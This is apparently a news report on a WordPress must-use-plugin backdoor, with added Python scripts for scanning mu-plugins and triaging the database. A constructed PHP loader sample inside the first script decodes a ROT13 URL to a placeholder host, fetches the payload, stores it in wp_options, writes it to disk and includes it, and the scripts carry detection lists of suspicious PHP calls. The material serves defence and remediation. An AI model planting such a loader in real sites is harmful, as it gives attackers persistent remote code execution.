Cybersecurity researchers have uncovered a new stealthy backdoor hidden inside the "mu-plugins" directory of WordPress sites that grants threat actors persistent access and allows them to carry out arbitrary actions.
Must-use plugins (aka mu-plugins) are special plugins that are automatically activated on every WordPress site in the installation. They are placed in the "wp-content/mu-plugins" directory by default.
What makes them an attractive option for attackers is that mu-plugins do not appear in the default list of plugins on the Plugins page of wp-admin (they are shown only under a separate "Must-Use" view) and cannot be deactivated from the dashboard at all: the only way to disable one is to remove its file from the must-use directory.
As a result, a piece of malware that leverages this technique can operate quietly, without raising any red flags.
In the infection observed by web security company Sucuri, the PHP script in the mu-plugins directory ("wp-index.php") serves as a loader that fetches a next-stage payload and saves it in the WordPress database, in the wp_options table under the option name _hdra_core.
The remote payload is retrieved from a URL that is obfuscated using ROT13, a simple substitution cipher that replaces each letter with the letter 13 positions after it (i.e., A becomes N, B becomes O, C becomes P, and so on). Because 13 is half the alphabet, applying ROT13 a second time restores the original text, which is why a one-line str_rot13() call is all the loader needs to recover the URL at runtime.
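The two properties above (files in mu-plugins auto-load without appearing in the default plugin list, and the C2 URL survives only as a ROT13 literal) make the directory a natural place to audit. The following is an added example, not Sucuri's code or anything from the original write-up: it walks wp-content/mu-plugins, flags the function calls a loader of this kind needs (remote fetch, base64/ROT13 decoding, writing to disk, storing into wp_options), and ROT13-decodes every string literal to surface obfuscated URLs. The sample tree it builds, the benign "site-tweaks.php" plugin, the loader-like file's contents and the hostname example.com are all constructed for the demonstration; only the file name "wp-index.php" and the option name _hdra_core come from the report.

```python
"""Audit wp-content/mu-plugins for loader-style PHP files.

Added example; not Sucuri's code and not part of the original article.
"""
import os
import re
import tempfile

# Calls that a legitimate must-use plugin rarely needs but a loader cannot do
# without: fetch a remote body, decode it, persist it, write it, execute it.
SUSPICIOUS_CALLS = (
    "eval", "str_rot13", "base64_decode", "file_get_contents", "curl_exec",
    "wp_remote_get", "file_put_contents", "update_option",
)

# Single- or double-quoted PHP string literal (group 2 is the contents).
STRING_LITERAL = re.compile(r"""(['"])((?:\\.|(?!\1).)+)\1""")
URL_RE = re.compile(r"^https?://[A-Za-z0-9.-]+", re.IGNORECASE)

_ROT13 = str.maketrans(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so decoding is the same operation as encoding."""
    return text.translate(_ROT13)


def decode_obfuscated_urls(php_source: str) -> list[str]:
    """Return every string literal that becomes an http(s) URL after ROT13."""
    return [rot13(lit) for _q, lit in STRING_LITERAL.findall(php_source)
            if URL_RE.match(rot13(lit))]


def suspicious_calls(php_source: str) -> list[str]:
    """Return the SUSPICIOUS_CALLS names that appear as function calls."""
    return [name for name in SUSPICIOUS_CALLS
            if re.search(r"\b" + name + r"\s*\(", php_source)]


def scan_mu_plugins(wp_content: str) -> dict[str, dict]:
    """Map each .php file under mu-plugins with findings to its calls and URLs.

    Files with no findings are omitted; a missing directory yields {}.
    """
    mu_dir = os.path.join(wp_content, "mu-plugins")
    findings: dict[str, dict] = {}
    if not os.path.isdir(mu_dir):
        return findings
    for root, _dirs, files in os.walk(mu_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            calls, urls = suspicious_calls(source), decode_obfuscated_urls(source)
            if calls or urls:
                rel = os.path.relpath(path, wp_content)
                findings[rel] = {"calls": calls, "urls": urls}
    return findings


# Constructed sample inputs (not the real malware). The second file mimics
# the loader pattern from the report: ROT13 URL -> fetch -> store in
# wp_options -> write to disk -> include. example.com is a placeholder.
BENIGN_MU_PLUGIN = """<?php
/* Plugin Name: Site Tweaks */
add_filter('xmlrpc_enabled', '__return_false');
"""

LOADER_LIKE = """<?php
$u = str_rot13('uggcf://rknzcyr.pbz/cnlybnq');
$body = wp_remote_retrieve_body(wp_remote_get($u));
update_option('_hdra_core', base64_encode($body));
$tmp = WP_CONTENT_DIR . '/uploads/.tmp.php';
file_put_contents($tmp, base64_decode(get_option('_hdra_core')));
include $tmp;
"""


def build_sample_tree() -> str:
    """Create a throwaway wp-content tree holding the two constructed files."""
    wp_content = tempfile.mkdtemp(prefix="wp-content-")
    mu_dir = os.path.join(wp_content, "mu-plugins")
    os.makedirs(mu_dir)
    with open(os.path.join(mu_dir, "site-tweaks.php"), "w") as fh:
        fh.write(BENIGN_MU_PLUGIN)
    with open(os.path.join(mu_dir, "wp-index.php"), "w") as fh:
        fh.write(LOADER_LIKE)
    return wp_content


if __name__ == "__main__":
    for path, hit in scan_mu_plugins(build_sample_tree()).items():
        print(f"{path}: calls={hit['calls']} decoded_urls={hit['urls']}")
```

Run it against a real site by passing the site's wp-content path to scan_mu_plugins() instead of the sample tree. Any hit is worth a manual read of the file: the call list alone is a heuristic, but a ROT13 literal that decodes to a URL has no honest reason to be in a must-use plugin.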
"The fetched content is then temporarily written to disk and executed," security researcher Puja Srivastava said. "This backdoor gives the attacker persistent access to the site and the ability to run any PHP code remotely."
Specifically, it injects a hidden file manager into the theme directory as "pricing-table-3.php," allowing threat actors to browse, upload, or delete files. It also creates an administrator user named "officialwp" and then downloads a malicious plugin ("wp-bot-protect.php") and activates it.
Besides reinstating the infection if its files are deleted, the malware has the ability to change the passwords of common administrator usernames, such as "admin," "root," and "wpsupport," to a default password set by the attacker. This also extends to its own "officialwp" user.
In doing so, the threat actors retain persistent access to the sites and can perform malicious actions while effectively locking out other administrators. This can range from data theft to injecting code that serves malware to site visitors or redirects them to scam sites.
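Because the second stage lives in wp_options and the foothold is an extra administrator account, cleaning the mu-plugins directory alone does not finish the job; the database has to be triaged too. The following is an added example, not Sucuri's code or the page's own: it runs the two checks a responder would make against the three WordPress tables involved, using an in-memory SQLite copy as a stand-in for the site's MySQL database. The table prefix wp_, the harmless base64-encoded stand-in payload, the user names other than "officialwp", and the registration dates are constructed for the demonstration; the option name _hdra_core and the login "officialwp" are the indicators named in the report.

```python
"""Triage wp_options and administrator accounts for the persistence above.

Added example; not Sucuri's code and not part of the original article.
"""
import base64
import re
import sqlite3

# An option value that is PHP, or that base64-decodes to PHP, is never
# legitimate site configuration. The 32-character floor is a heuristic.
PHP_MARKERS = re.compile(r"<\?php|\beval\s*\(|\bbase64_decode\s*\(", re.IGNORECASE)
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
KNOWN_OPTION_NAMES = {"_hdra_core"}    # from the Sucuri write-up
KNOWN_ROGUE_LOGINS = {"officialwp"}    # from the Sucuri write-up

# Minimal copies of the three WordPress tables the checks touch.
SCHEMA = """
CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT,
                         option_value TEXT, autoload TEXT);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                          meta_key TEXT, meta_value TEXT);
"""

# Constructed stand-in for a stored second stage: harmless PHP, base64-encoded
# the way the loader keeps its fetched payload before writing it to disk.
STAGE2 = base64.b64encode(b"<?php /* constructed stand-in, does nothing */ ?>").decode()
ADMIN_CAPS = 'a:1:{s:13:"administrator";b:1;}'   # WordPress serialized role
EDITOR_CAPS = 'a:1:{s:6:"editor";b:1;}'


def load_sample_db() -> sqlite3.Connection:
    """Build a small WordPress-shaped database with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_options VALUES (?,?,?,?)", [
        (1, "siteurl", "https://example.com", "yes"),
        (2, "blogname", "Example Site", "yes"),
        (3, "_hdra_core", STAGE2, "no"),
    ])
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?)", [
        (1, "owner", "2021-03-02 10:00:00"),
        (2, "editor1", "2022-07-19 09:30:00"),
        (3, "officialwp", "2025-09-28 03:14:07"),
    ])
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", [
        (1, 1, "wp_capabilities", ADMIN_CAPS),
        (2, 2, "wp_capabilities", EDITOR_CAPS),
        (3, 3, "wp_capabilities", ADMIN_CAPS),
    ])
    return conn


def looks_like_code(value: str) -> bool:
    """True if an option value is PHP, or base64 that decodes to PHP."""
    if PHP_MARKERS.search(value):
        return True
    if BASE64_BLOB.match(value):
        try:
            decoded = base64.b64decode(value, validate=True).decode("utf-8", "replace")
        except ValueError:          # binascii.Error is a ValueError
            return False
        return bool(PHP_MARKERS.search(decoded))
    return False


def suspicious_options(conn: sqlite3.Connection) -> list[str]:
    """Option names that are known indicators or whose values hold code."""
    rows = conn.execute("SELECT option_name, option_value FROM wp_options").fetchall()
    return sorted(name for name, value in rows
                  if name in KNOWN_OPTION_NAMES or looks_like_code(value or ""))


def administrators(conn: sqlite3.Connection) -> list[tuple[str, str]]:
    """Every account whose serialized capabilities include the administrator role."""
    return conn.execute("""
        SELECT u.user_login, u.user_registered
        FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = 'wp_capabilities'
          AND m.meta_value LIKE '%"administrator"%'
        ORDER BY u.user_registered""").fetchall()


def suspicious_admins(conn: sqlite3.Connection, last_known_good: str) -> list[str]:
    """Admins with a known rogue login or registered after the last clean audit."""
    return [login for login, registered in administrators(conn)
            if login in KNOWN_ROGUE_LOGINS or registered > last_known_good]


if __name__ == "__main__":
    db = load_sample_db()
    print("options holding code:", suspicious_options(db))
    print("administrators:", administrators(db))
    print("admins to review:", suspicious_admins(db, "2024-01-01 00:00:00"))
```

On a live site the same two queries can be issued through WP-CLI or directly against MySQL, and the remediation follows from what they return: delete the option, remove or demote the rogue account, and then reset the password of every remaining administrator, since the malware is reported to overwrite the passwords of common admin logins with its own default.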
"The attackers gain full administrator access and a persistent backdoor, allowing them to do anything on the site, from installing additional malware to defacing it," Srivastava said. "The remote command execution and content injection features mean the attackers can change the malware's behavior."
To mitigate these threats, site owners should keep WordPress, themes, and plugins up to date, secure accounts with two-factor authentication, and regularly audit all parts of the site, including the theme and plugin files and the mu-plugins directory, which the dashboard's default plugin list does not show.